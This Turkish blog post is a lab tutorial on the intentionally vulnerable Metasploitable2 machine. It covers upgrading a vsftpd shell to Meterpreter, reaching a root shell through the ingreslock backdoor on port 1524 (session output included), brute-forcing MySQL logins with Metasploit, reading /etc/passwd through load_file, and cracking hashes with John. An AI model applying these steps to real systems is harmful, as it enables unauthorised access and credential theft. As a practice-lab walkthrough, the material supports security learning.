Ekim 19, 2021
11 11 11 ÖÖ
TCP nedir ? Aktarım Katmanı 2
Aktarım Katmanı Tcp Nedir
Yönlendirme Nedir 2 ?
Yönlendirme Nedir ?
Ağ Katmanı Nedir 2 ?
Ağ Katmanı Nedir ?
Veri Bağı Katmanı Nedir 2 ?
Android Studio Nasıl Kurulur ?
Veri Bağı Katmanı Nedir ?
Fiziksel Katman Nedir ?
Son Yazılar
TCP nedir ? Aktarım Katmanı 2 Aktarım Katmanı Tcp Nedir Yönlendirme Nedir 2 ? Yönlendirme Nedir ? Ağ Katmanı Nedir 2 ? Ağ Katmanı Nedir ? Veri Bağı Katmanı Nedir 2 ? Android Studio Nasıl Kurulur ? Veri Bağı Katmanı Nedir ? Fiziksel Katman Nedir ?
metasploitable2 exploit

Ftp , Mysql , İngreslock Zafiyeti Nasıl Sızılır ?

Paylaşım , Takip İçin

Mysql , İngreslock zafiyetleri için aşağı inmeniz yeterlidir.

ftp zafiyeti – vsftpd 

vsftp ilk konumuz olarak anlattım fakat burda son kısımlarda farklılıklar olucak

Shelle düştükten sonra meterpreterimizi açmamız için shellimizden geri çıkıp

multi/manage/shell_to_meterpreter

komutumuzu giriyoruz daha sonra ayarlamalarımızı yapıp

sessions -i 2

komutumuz ile meterpretere geçiş yapıyoruz 

Meterpreterimizden şifreleri alıp john ile çözüyoruz dilersek meterpreter komutlarıyla farklı işlerde yapabiliriz 

İngreslock

ingreslock 1524 portunu kullanan DoS atakları, rootkit ,backdoor yerleştirmek için kullanılan bir servistir. Bu servisin çalıştığı porta telnet ile ulaşılabilir.

1524/tcp open  ingreslock?

#telnet 192.168.138.129 1524

Trying 192.168.138.129

Connected to 192.168.138.129.

Escape character is ‘^]’.

root@metasploitable:/# whoami

root

root@metasploitable:/# root@metasploitable:/# uname -a

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

root@metasploitable:/# root@metasploitable:/#

Sisteme root haklarıyla giriş yapılmıştır gördüğünüz gibi.

Mysql

Mysql çok kullanılan bir veritabanı yönetim sistemidir. Burası verilerin tutulduğu bir yerdir. Biz bu verilere ulaşıp  almayı deneyeceğiz. Şimdi sizlerle mysql üzerinden ad şifre almayı göstereceğim. 

İlk önce mysql ve adresimizi girdikten sonra show database diyerek veritabanımızı getiriyoruz.

Parola johntheripper ile kolayca kırılabilir. Admin şifresi md5 ile özeti alınmış bir şifresi vardr ve sonuç olarak : 

“adminadmin” çıkmaktadır.

Sistemde tikiwiki olduğunu da bir kez daha gördük bunun üzerinden de gidilebilir.

Mysql (Metasploit)

Mysql çok kullanılan bir veritabanı yönetim sistemidir. Burası verilerin tutulduğu bir yerdir. Biz bu verilere ulaşıp  almayı deneyeceğiz. Nasıl yapacağımıza gelecek olursak. Servisin çalıştığı nmap çıktısından görülebilir.

3306/tcp open  mysql            MySQL 5.0.51a-3ubuntu5

İlk olarak metasploitimize giriş yapıyoruz. Sonrasında search mysql login diyerek modülümüzü arıyoruz sonrasında mysql_logini seçip ayarlarımıza bakıyoruz.

 

Ayarlarımızda rhostumuzu değişiyoruz daha sonrasında giriş yapmamız için user_file ile pass_file ımızı değiştiriyoruz fakat daha kapsamlı bir username password listeleri kullanabilirsiniz. Son olarakta boş şifresi olanları görebilmemiz için blank_passw true yapıyoruz sonrasında exploit diyoruz

Daha sonrasında bulduğumuz root ve guest imizin şifrelerinin açık olduğunu görüyoruz ve giriş yapmamış için alttaki komutu giriyoruz

use auxiliary/admin/mysql/mysql_sql

Sonrasında girmemiz gereken değerleri görmemiz için ayarlarına bakıyoruz

Show database dediğimiz zaman bize sistemdeki kayıtlı olan databaseleri göstericek eğer load_file etc/passwd dersek de etc içerisindeki passwordları bize getiricek.

Gördüğünüz gibi veri tabanından kullanıcı adları ve şifrelerini almış olduk. Dilerseniz bu ad şifreler ile giriş yaparak istediğiniz bilgiyi alabilirsiniz.


Paylaşım , Takip İçin
5 1 vote
Article Rating

Bir Cevap Yazın

1 Yorum
Oldest
Newest Most Voted
Inline Feedbacks
View all comments

[…] ftp […]

1
0
Would love your thoughts, please comment.x
()
x
HAYALİNDEKİ YAZILIM
%d blogcu bunu beğendi: